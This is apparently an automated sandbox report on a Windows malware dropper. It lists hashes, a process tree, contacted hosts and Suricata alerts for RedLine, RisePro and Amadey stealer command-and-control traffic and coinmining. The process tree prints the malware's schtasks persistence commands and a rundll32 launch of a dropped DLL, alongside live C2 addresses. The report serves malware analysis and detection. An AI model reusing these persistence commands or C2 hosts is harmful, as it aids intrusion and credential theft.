Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 26, 2024, 9 a.m.	Jan. 26, 2024, 9:02 a.m.

Size	1.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`2f9214f932a930a4cdff2b48a3a8eded`
SHA256	`f969980852d4ccaf32b5700f4aa0934c853b1afa18c0a7f329e841d62cb35f46`
CRC32	`A409114B`
ssdeep	`24576:vpqzJdQmBHqhszkXEoiDYq4dXwQaN2K3yWds0JkKyV/aDdhCm2Ft:RqzHRUEoEYq4lXadsL4sF`
Yara	IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature anti_vm_detect - Possibly employs anti-virtualization techniques

rost.exe "C:\Users\test22\AppData\Local\Temp\rost.exe"
1932
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2432
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2540
- KUrJTQEsIHMvAcabBVxa.exe "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe"
  2708
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2760
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2760 CREDAT:145409
      2840
- EOhQhAkcbWTB_T1v1y_S.exe "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\EOhQhAkcbWTB_T1v1y_S.exe"
  804
  - explorhe.exe "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe"
    316
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
      2460
    - stan.exe "C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe"
      1664
    - installs.exe "C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe"
      2976
    - fsdfsfsfs.exe "C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe"
      2108
    - MRK.exe "C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe"
      2060
    - sadsadsadsa.exe "C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe"
      2992
    - Atqumy.exe "C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe"
      2660
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      3128
    - latestrocki.exe "C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe"
      3196
      - InstallSetup7.exe "C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe"
        3264
        
        BroomSetup.exe C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
        3380
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\Temp\Task.bat" "
        3624
        
        chcp.com chcp 1251
        3684
        
        schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        3756
        
        nshDAD7.tmp C:\Users\test22\AppData\Local\Temp\nshDAD7.tmp
        2368
      - toolspub1.exe "C:\Users\test22\AppData\Local\Temp\toolspub1.exe"
        3312
    - moto.exe "C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe"
      3824
    - crypted.exe "C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe"
      1464
    - 2024.exe "C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe"
      3212
    - alex.exe "C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe"
      3372
    - rdx1122.exe "C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe"
      3532
      - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2620
- txBA3rlC1VaXg6uHQQD1.exe "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe"
  2028
- Q2lP3WOPFRddpU6U21z0.exe "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe"
  2868
- K5hUVnj3aMwtC3i_NpaY.exe "C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe"
  2524
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
accounts.google.com	A 142.251.170.84	142.250.157.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.250.66.36	142.250.76.132
ssl.gstatic.com	A 216.58.203.67	142.250.76.131
pool.hashvault.pro	A 125.253.92.50 A 131.153.76.130	142.202.242.43
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	172.67.75.166

IP Address	Status	Action
104.26.4.15	Active	Moloch
109.107.182.3	Active	Moloch
125.253.92.50	Active	Moloch
141.95.211.148	Active	Moloch
142.250.66.36	Active	Moloch
142.251.170.84	Active	Moloch
164.124.101.2	Active	Moloch
185.172.128.109	Active	Moloch
185.172.128.19	Active	Moloch
185.172.128.90	Active	Moloch
185.215.113.68	Active	Moloch
193.233.132.62	Active	Moloch
216.58.203.67	Active	Moloch
34.117.186.192	Active	Moloch
5.42.64.33	Active	Moloch
94.156.67.230	Active	Moloch
195.20.16.103	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 192.168.56.103:49180 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49187 -> 142.251.170.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49198 -> 142.250.66.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 142.251.170.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49195	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.68:80 -> 192.168.56.103:49195	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49195	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49195	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 216.58.203.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 216.58.203.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49204	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49209 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49199 -> 142.250.66.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2014819	ET INFO Packed Executable Download	Misc activity
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49207 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49207 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49207 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49207 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 94.156.67.230:13781 -> 192.168.56.103:49217	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49210	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49220	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.103:49220	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49220	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 94.156.67.230:13781 -> 192.168.56.103:49217	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49227 -> 185.172.128.90:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49232 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49232 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49232 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 94.156.67.230:13781	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 195.20.16.103:20440 -> 192.168.56.103:49243	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49246 -> 185.172.128.109:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49246 -> 185.172.128.109:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 195.20.16.103:20440 -> 192.168.56.103:49243	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 185.172.128.109:80 -> 192.168.56.103:49246	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.109:80 -> 192.168.56.103:49246	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 141.95.211.148:46011 -> 192.168.56.103:49251	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 141.95.211.148:46011 -> 192.168.56.103:49251	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49251 -> 141.95.211.148:46011	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49234 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
UDP 192.168.56.103:64178 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49243 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49230	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49230 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2022491	ET HUNTING Download Request Containing Suspicious Filename - Crypted	A Network Trojan was detected
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49232 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49207 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49187 142.251.170.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
TLSv1 192.168.56.103:49198 142.250.66.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLSv1 192.168.56.103:49186 142.251.170.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
